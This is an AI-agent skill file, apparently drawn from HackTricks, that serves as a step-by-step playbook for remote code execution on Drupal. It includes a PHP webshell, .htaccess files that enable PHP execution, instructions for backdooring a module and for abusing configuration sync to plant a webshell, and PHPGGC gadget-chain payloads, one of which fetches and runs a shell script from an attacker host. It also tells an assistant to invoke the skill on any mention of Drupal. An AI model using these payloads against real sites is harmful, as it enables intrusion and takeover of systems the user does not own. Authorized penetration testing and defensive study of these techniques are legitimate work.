Hacktricks-skills drupal-rce-exploitation

Exploit Drupal vulnerabilities for remote code execution. Use this skill whenever the user mentions Drupal exploitation, Drupal RCE, Drupal pentesting, Drupal security testing, PHP Filter module, Drupal configuration synchronization, Drupal gadget chains, or any Drupal-related security assessment. This skill covers PHP Filter module exploitation, backdoored modules, configuration sync abuse, and core gadget chain attacks (SA-CORE-2024-007/008).

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/network-services-pentesting/pentesting-web/drupal/drupal-rce/SKILL.MD

source content

Drupal RCE Exploitation

A comprehensive skill for exploiting Drupal vulnerabilities to achieve remote code execution. This skill covers multiple attack vectors across different Drupal versions.

When to Use This Skill

Use this skill when:

Testing Drupal applications for security vulnerabilities
Attempting RCE against Drupal 7, 8, 10, or 11
Working with PHP Filter module exploitation
Leveraging configuration synchronization features
Exploiting unsafe deserialization in contrib modules
Using Drupal core gadget chains (SA-CORE-2024-007/008)

Prerequisites

Target Drupal installation accessible via HTTP/HTTPS
For some techniques: authenticated admin access
PHPGGC tool for gadget chain payloads (optional but recommended)
Basic understanding of Drupal architecture

Exploitation Techniques

1. PHP Filter Module (Drupal < 8)

The PHP Filter module allows embedded PHP code execution. In Drupal 8+, it's not installed by default.

Detection:

# Check if PHP filter module is installed
curl -I http://target/modules/php
# 403 response indicates the module exists

Exploitation Steps:

Navigate to
```
/admin/modules
```
and enable
```
PHP Filter
```
module
Go to
```
Add content
```
→
```
Basic Page
```
or
```
Article
```
Insert PHP backdoor code
Set Text format to
```
PHP code
```
Preview and save
Trigger by accessing the node:
```
curl http://target/node/3
```

Backdoor Example:

<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>

2. Install PHP Filter Module (Drupal 8+)

For Drupal 8+, manually install the PHP Filter module:

Download:

wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

Navigate to
```
Administration
```
→
```
Reports
```
→
```
Available updates
```
Click
```
Browse
```
, select the downloaded file, and click
```
Install
```
Create a new page with PHP code format enabled

3. Backdoored Module Technique

Download a legitimate module, inject a backdoor, and install it:

Download a module (e.g., Turnstile) in compressed format
Add a PHP backdoor file inside the module

Create

.htaccess

to enable PHP execution:

<IfModule mod_rewrite.c>
  RewriteEngine On
  RewriteBase /
</IfModule>

Install via
```
/admin/modules/install
```
Access:
```
/modules/turnstile/back.php
```

4. Configuration Synchronization Exploitation

This technique leverages Media and Media Library modules with configuration sync.

Step 1: Activate Required Modules

Navigate to
```
/admin/modules
```
Enable
```
Media
```
and
```
Media Library
```
modules

Step 2: Patch Configuration Files

Export configuration from

/admin/config/development/configuration/single/export

and modify:

system.file.yml:

allow_insecure_uploads: true

field.field.media.document.field_media_document.yml:

file_extensions: 'htaccess txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'

Import the patched configuration via

/admin/config/development/configuration/single/import

Step 3: Upload Webshell

Upload

.htaccess

file via

/media/add/document

<Files *>
  SetHandler application/x-httpd-php
</Files>
<IfModule mod_php.c>
  php_flag engine on
</IfModule>
<IfModule mod_php7.c>
  php_flag engine on
</IfModule>
<IfModule mod_php5.c>
  php_flag engine on
</IfModule>

Upload
```
LICENSE.txt
```
with embedded PHP webshell (see
```
scripts/create_webshell.py
```
)

Step 4: Interact with Webshell

Access the uploaded file with the cookie parameter:

curl -c cookie.txt -b "89e127753a890d9c4099c872704a0711bbafbce9=phpinfo();" http://target/sites/default/files/LICENSE.txt

5. Drupal Core Gadget Chain (SA-CORE-2024-007/008)

Affected Versions:

Drupal 7.0–7.101
Drupal 8.x
Drupal 10.2.0–10.2.10
Drupal 10.3.0–10.3.8
Early 11.x

Patched in: 10.2.11 / 10.3.9 / 7.102

Exploitation Workflow:

Find unserialize sink in contrib modules or custom code:

grep -r "unserialize(" /path/to/drupal
grep -r "Drupal\\Component\\Serialization\\PhpSerialize::decode" /path/to/drupal

Generate payload using PHPGGC:

./phpggc drupal/rce2 system 'id' > payload.ser

Deliver payload to the sink:

curl -X POST https://target/admin/config/some/module \
     -d "serialized_setting=$(cat payload.ser)"

Trigger execution (often automatic at end of request)

Vulnerable Contrib Modules (Late 2024):

Mailjet (<4.0.1, CVE-2024-13296)
Eloqua (7.x-1.x < 1.15, CVE-2024-13297)

Example Exploitation:

phpggc drupal/rce2 system 'bash -c "curl http://attacker/shell.sh|sh"' > p.ser
curl -b session=ADMINCOOKIE \
     -F "import=@p.ser" https://target/admin/config/eloqua/import

Helper Scripts

Use the bundled scripts for common tasks:

```
scripts/generate_gadget_payload.py
```
- Generate PHPGGC payloads for Drupal gadget chains
```
scripts/create_webshell.py
```
- Create LICENSE.txt webshell with cookie-based command execution
```
scripts/create_htaccess.py
```
- Generate .htaccess file for PHP execution

Version Detection

Check Drupal version before attempting exploitation:

# Check core file
curl http://target/core/lib/Drupal.php

# Check changelog
curl http://target/CHANGELOG.txt

# Check robots.txt for version hints
curl http://target/robots.txt

Safety Notes

Only use these techniques on systems you own or have explicit authorization to test
Some techniques require authenticated admin access
Configuration synchronization exploitation may be blocked by proper file system permissions
Gadget chains require finding an unserialize sink in the target application